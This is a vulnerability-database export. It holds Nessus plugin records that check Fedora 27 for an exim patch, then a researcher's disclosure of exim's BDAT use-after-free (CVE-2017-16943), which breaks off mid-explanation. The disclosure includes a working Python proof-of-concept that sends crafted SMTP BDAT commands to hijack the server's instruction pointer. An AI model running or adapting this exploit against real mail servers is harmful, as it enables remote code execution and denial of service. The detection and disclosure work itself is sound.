"description"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "86f676e5b21f32f64daf43dedf620470", "key": "href"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "140db532f722454444f5ad70cb0fb5d6", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2018-09-01T23:41:01", "modified": "2018-02-01T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/02/01 15:56:50 $\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of 
service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = 
os_ver[1];\nif (! ereg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:41:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "cvelist": ["CVE-2017-16943", "CVE-2017-16944"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 8, "enchantments": {"dependencies": {"modified": "2019-11-01T02:27:37", "references": [{"idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"], "type": "freebsd"}, {"idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"], "type": "zdt"}, {"idList": ["USN-3499-1", "USN-3493-1"], "type": "ubuntu"}, {"idList": ["SSV:96896", "SSV:96905"], "type": "seebug"}, {"idList": ["ALAS-2017-932"], "type": "amazon"}, {"idList": 
["PACKETSTORM:145152"], "type": "packetstorm"}, {"idList": ["ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "UBUNTU_USN-3499-1.NASL", "FEDORA_2017-0032BAA7D7.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3493-1.NASL"], "type": "nessus"}, {"idList": ["DEBIAN:DSA-4053-1:6BF76"], "type": "debian"}, {"idList": ["EDB-ID:43184"], "type": "exploitdb"}, {"idList": ["CVE-2017-16943", "CVE-2017-16944"], "type": "cve"}, {"idList": ["GLSA-201803-01"], "type": "gentoo"}, {"idList": ["OPENSUSE-SU-2017:3220-1"], "type": "suse"}, {"idList": ["OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310873919", "OPENVAS:1361412562310843380", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310873907"], "type": "openvas"}, {"idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"], "type": "thn"}]}, "score": {"modified": "2019-11-01T02:27:37", "value": 7.6, "vector": "NONE"}}, "hash": "109b1267e16802bf153a79f054f04ab7ddef992dc6be82bc8c10047bf398c2a2", "hashmap": [{"hash": "5b0aef06cc449031985b7ee781024ce7", "key": "sourceData"}, {"hash": "cc82f834bb7cc4b7c64d263036c9ad35", "key": "description"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "9534580353e4d1e80d9c9d4dd82550d2", "key": "cpe"}, {"hash": "3b4669c901cc98352aa667bd94356c1b", "key": "title"}, {"hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb", "key": "references"}, {"hash": "3fcf3472ec23d37b4712de598fcb8d16", "key": "published"}, {"hash": "0975adf19adb993cc2dc44ea6b27d31e", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "24746ac5a48e8a4f39b11cf8e22e39f3", "key": "pluginID"}, {"hash": "485c41a48047d23b0282ee19ec1cc5f9", "key": "href"}, {"hash": 
"0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "4c79fb001bf5cf57d4d013553e6d201f", "key": "cvelist"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/105803", "id": "FEDORA_2017-0053BB9719.NASL", "lastseen": "2019-11-01T02:27:37", "modified": "2019-11-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "105803", "published": "2018-01-15T00:00:00", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719"], "reporter": "This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected 
exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "title": "Fedora 27 : exim (2017-0053bb9719)", "type": "nessus", "viewCount": 3}, "differentElements": ["modified"], "edition": 8, "lastseen": "2019-11-01T02:27:37"}], "edition": 9, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "9534580353e4d1e80d9c9d4dd82550d2"}, {"key": "cvelist", "hash": "4c79fb001bf5cf57d4d013553e6d201f"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "description", "hash": "cc82f834bb7cc4b7c64d263036c9ad35"}, {"key": "href", "hash": "485c41a48047d23b0282ee19ec1cc5f9"}, {"key": "modified", "hash": "5a7504dfe859a7ccbaf560628f6442ad"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "24746ac5a48e8a4f39b11cf8e22e39f3"}, {"key": "published", "hash": "3fcf3472ec23d37b4712de598fcb8d16"}, {"key": "references", "hash": "96e0ec6bed45bc10e2fcb3ed5ccabcdb"}, {"key": "reporter", "hash": "0975adf19adb993cc2dc44ea6b27d31e"}, {"key": "sourceData", "hash": "5b0aef06cc449031985b7ee781024ce7"}, {"key": "title", "hash": "3b4669c901cc98352aa667bd94356c1b"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "6ea1fee246b377d82e88bbf615aa5bd735ba5b00f82d38c245518e084cab5897", 
"viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "seebug", "idList": ["SSV:96896", "SSV:96905"]}, {"type": "cve", "idList": ["CVE-2017-16944", "CVE-2017-16943"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873919", "OPENVAS:1361412562310704053", "OPENVAS:1361412562310873907", "OPENVAS:1361412562310140539", "OPENVAS:1361412562310843388", "OPENVAS:1361412562310851658", "OPENVAS:1361412562310843380"]}, {"type": "hackerone", "idList": ["H1:296994", "H1:296991"]}, {"type": "nessus", "idList": ["FEDORA_2017-0032BAA7D7.NASL", "ALA_ALAS-2017-932.NASL", "DEBIAN_DSA-4053.NASL", "GENTOO_GLSA-201803-01.NASL", "FREEBSD_PKG_75DD622CD5FD11E7B9FEC13EB7BCBF4F.NASL", "EXIM_BDAT_CHUNK_UAF.NASL", "UBUNTU_USN-3493-1.NASL", "OPENSUSE-2017-1342.NASL", "UBUNTU_USN-3499-1.NASL"]}, {"type": "amazon", "idList": ["ALAS-2017-932"]}, {"type": "thn", "idList": ["THN:EE92331B07B64A7332ABABDA5C30ACC1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4053-1:6BF76"]}, {"type": "gentoo", "idList": ["GLSA-201803-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:43184"]}, {"type": "zdt", "idList": ["1337DAY-ID-29068", "1337DAY-ID-29082"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145152"]}, {"type": "ubuntu", "idList": ["USN-3499-1", "USN-3493-1"]}, {"type": "freebsd", "idList": ["75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:3220-1"]}], "modified": "2019-12-13T07:04:30"}, "score": {"value": 7.6, "vector": "NONE", "modified": "2019-12-13T07:04:30"}, "vulnersScore": 7.6}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-0053bb9719.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105803);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/09/24 14:09:05\");\n\n script_cve_id(\"CVE-2017-16943\", \"CVE-2017-16944\");\n script_xref(name:\"FEDORA\", 
value:\"2017-0053bb9719\");\n\n script_name(english:\"Fedora 27 : exim (2017-0053bb9719)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing denial of service (CVE-2017-16944).\n\n----\n\nThis is an update fixing use-after-free (CVE-2017-16943).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-0053bb9719\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"exim-4.89-7.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "105803", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:exim"], "scheme": null}
{"seebug": [{"lastseen": "2017-12-25T18:30:33", "bulletinFamily": "exploit", "description": "On 23 November, 2017, we reported two vulnerabilities to Exim. These bugs exist in the SMTP daemon and attackers do not need to be authenticated, including CVE-2017-16943 for a use-after-free (UAF) vulnerability, which leads to Remote Code Execution (RCE); and CVE-2017-16944 for a Denial-of-Service (DoS) vulnerability.\r\n\r\n### About Exim\r\n\r\nExim is a message transfer agent (MTA) used on Unix systems. Exim is an open source project and is the default MTA on Debian GNU/Linux systems. According to our survey, there are about 600k SMTP servers running exim on 21st November, 2017 (data collected from scans.io). Also, a [mail server survey](http://www.securityspace.com/s_survey/data/man.201710/mxsurvey.html) by E-Soft Inc. shows over half of the mail servers identified are running exim.\r\n\r\n### Affected\r\n\r\n* Exim version 4.88 & 4.89 with chunking option enabled.\r\n* According to our survey, about 150k servers affected on 21st November, 2017 (data collected from scans.io).\r\n\r\n### Vulnerability Details\r\n\r\nThrough our research, the following vulnerabilities were discovered in Exim. Both vulnerabilities involve the BDAT command. BDAT is an extension to the SMTP protocol, which is used to transfer large and binary data. A BDAT command is like `BDAT 1024` or `BDAT 1024 LAST`. With the SIZE and LAST declared, mail servers do not need to scan for the end dot anymore. This command was introduced to exim in version 4.88, and also brought some bugs.\r\n\r\n* Use-after-free in receive_msg leads to RCE (CVE-2017-16943)\r\n* Incorrect BDAT data handling leads to DoS (CVE-2017-16944)\r\n\r\n### Use-after-free in receive_msg leads to RCE\r\n\r\n#### Vulnerability Analysis\r\n\r\nTo explain this bug, we need to start with the memory management of exim. There is a series of functions starting with `store_` such as `store_get`, `store_release`, `store_reset`. 
These functions are used to manage dynamically allocated memory and improve performance. Its architecture is like the illustration below:\r\n\r\n\r\n\r\nInitially, exim allocates a big storeblock (default 0x2000) and then cuts it into stores when `store_get` is called, using global pointers to record the size of unused memory and where to cut in the next allocation. Once the `current_block` is insufficient, it allocates a new block and appends it to the end of the chain, which is a linked list, and then makes `current_block` point to it. Exim maintains three `store_pool`, that is, there are three chains like the illustration above and each of these global variables is actually an array.\r\nThis vulnerability is in `receive_msg` where exim reads headers: \r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1817)\r\n```\r\n if (ptr >= header_size - 4)\r\n {\r\n int oldsize = header_size;\r\n /* header_size += 256; */\r\n header_size *= 2;\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n store_release(next->text);\r\n next->text = newtext;\r\n }\r\n }\r\n```\r\n\r\nIt seems normal if the store functions are just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend a store, the function `store_extend` checks whether the old store is the latest store allocated in `current_block`. It returns False immediately if the check fails.\r\n\r\n[`store.c: 276 store_extend`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/store.c#L276)\r\n```\r\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\r\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\r\n return FALSE;\r\n```\r\n\r\nOnce `store_extend` fails, exim tries to get a new store and release the old one. 
After we look into `store_get` and `store_release`, we found that `store_get` returns a store, but `store_release` releases a whole block if the store is at the head of it. That is to say, if `next->text` points to the start of the `current_block` and store_get cuts a store inside it for newtext, then `store_release(next->text)` frees `next->text`, which is equal to current_block, and leaves newtext and `current_block` pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call `store_get` after `next->text` is allocated. This was impossible until the BDAT command was introduced into exim. BDAT makes `store_get` reachable and finally leads to an RCE.\r\n\r\nExim uses [function pointers](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/globals.h#L136) to switch between different input sources, such as `receive_getc`, `receive_getbuf`. When receiving BDAT data, `receive_getc` is set to bdat_getc in order to track the remaining chunk data size and to handle the command that follows the BDAT data. In `receive_msg`, exim also uses `receive_getc`. It loops to read data, and stores data into `next->text`, extending it if insufficient.\r\n\r\n[`receive.c: 1817 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1789)\r\n```\r\nfor (;;)\r\n {\r\n int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);\r\n \r\n /* If we hit EOF on a SMTP connection, it's an error, since incoming\r\n SMTP must have a correct \".\" terminator. */\r\n\r\n if (ch == EOF && smtp_input /* && !smtp_batched_input */)\r\n {\r\n smtp_reply = handle_lost_connection(US\" (header)\");\r\n smtp_yield = FALSE;\r\n goto TIDYUP; /* Skip to end of function */\r\n }\r\n```\r\n\r\nIn `bdat_getc`, once the SIZE is reached, it tries to read the next BDAT command and raises an error message if the following command is incorrect. 
\r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L628)\r\n```\r\n case BDAT_CMD:\r\n {\r\n int n;\r\n\r\n if (sscanf(CS smtp_cmd_data, \"%u %n\", &chunking_datasize, &n) < 1)\r\n {\r\n (void) synprot_error(L_smtp_protocol_error, 501, NULL,\r\n US\"missing size for BDAT command\");\r\n return ERR;\r\n }\r\n```\r\n\r\nIn exim, it usually calls `synprot_error` to raise error message, which also logs at the same time.\r\n\r\n[`smtp_in.c: 628 bdat_getc`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L2984)\r\n```\r\nstatic int\r\nsynprot_error(int type, int code, uschar *data, uschar *errmess)\r\n{\r\nint yield = -1;\r\n\r\nlog_write(type, LOG_MAIN, \"SMTP %s error in \\\"%s\\\" %s %s\",\r\n (type == L_smtp_syntax_error)? \"syntax\" : \"protocol\",\r\n string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);\r\n```\r\n\r\nThe log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as `'\\n'->'\\\\n'`. Therefore, it asks `store_get` for memory to store strings.\r\nThis store makes `if (!store_extend(next->text, oldsize, header_size))` in `receive_msg` failed when next extension occurs and then triggers use-after-free.\r\n\r\n### Exploitation\r\n\r\nThe following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to `0xdeadbeef`. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. 
The version with default configuration is also exploitable, and we will discuss it at the end of this section.\r\n```\r\n# CVE-2017-16943 PoC by meh at DEVCORE\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('127.0.0.1', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<meh@some.domain>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\n\r\nr.interactive()\r\n```\r\n\r\n* Running out of `current_block`\r\nIn order to achieve code execution, we need to make the `next->text` get the first store of a block. That is, running out of `current_block` and making `store_get` allocate a new block. Therefore, we send a long message `'a'*0x1250+'\\x7f'` with an unprintable character to cut `current_block`, making `yield_length` less than 0x100.\r\n\r\n\r\n\r\n* Starts BDAT data transfer\r\nAfter that, we send BDAT command to start data transfer. At the beginning, next and `next->text` are allocated by `store_get`. \r\n\r\n\r\n\r\nThe function `dkim_exim_verify_init` is called sequentially and it also calls `store_get`. Notice that this function uses ANOTHER `store_pool`, so it allocates from heap without changing `current_block` which `next->text` also points to.\r\n\r\n[`receive.c: 1734 receive_msg`](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1734)\r\n```\r\n if (smtp_input && !smtp_batched_input && !dkim_disable_verify)\r\n dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);\r\n```\r\n\r\n* Call `store_getc` inside `bdat_getc`\r\nThen, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the 